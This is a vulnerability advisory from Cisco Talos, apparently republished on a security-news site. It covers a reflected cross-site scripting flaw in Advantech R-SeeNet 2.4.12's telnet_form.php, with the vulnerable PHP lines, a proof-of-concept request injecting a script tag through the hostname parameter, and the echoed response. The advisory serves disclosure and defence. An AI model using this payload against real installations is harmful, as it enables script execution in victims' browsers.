Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-21799: TALOS-2021-1270 || Cisco Talos Intelligence Group

Cross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

CVE
#sql#xss#vulnerability#web#windows#cisco#apache#java#intel#php#telnet#firefox#ssl

Summary

Cross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

Tested Versions

Advantech R-SeeNet 2.4.12 (20.10.2020)

Product URLs

https://ep.advantech-bb.cz/products/software/r-seenet

CVSSv3 Score

9.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Details

R-SeeNet is the software system used for monitoring Advantech routers. It continuously collects information from individual routers in the network and records the data into a SQL database.

This vulnerability is present in telnet_form.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

The telnet_form.php script accepts hostname parameter coming from the user via a HTTP request:

php/telnet_form.php
Line 11   if(isset($_GET['hostname']) && ($_GET['hostname'] != ''))
Line 12   {  // hostname zadano
Line 13      $hostname = $_GET['hostname'];
Line 14   } 

The parameter is not sanitized in a context of XSS payload and further is embedded into HTML code :

Line 44         <title>Telnet <?php echo($hostname)?></title>

Request

GET /php/telnet_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close   
Upgrade-Insecure-Requests: 1

Response HTTP/1.1 200 OK Date: Fri, 05 Mar 2021 16:51:07 GMT Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.5 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1402 Connection: close Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="description" content="TODO - info">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="cache-control" content="no-cache">    
    <title>Telnet </title><script>alert(1)</script><title></title>

The victim does not need to be logged-in to be affected by this vulnerability.

Timeline

2021-03-11 - Initial contact with vendor
2021-03-14 - Advisory issued to CISA
2021-04-13 - Follow up with vendor & CISA
2021-06-07 - Follow up with vendor & CISA (no response)
2021-06-22 - Final 90 day notice issued
2021-07-15 - Public Disclosure

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907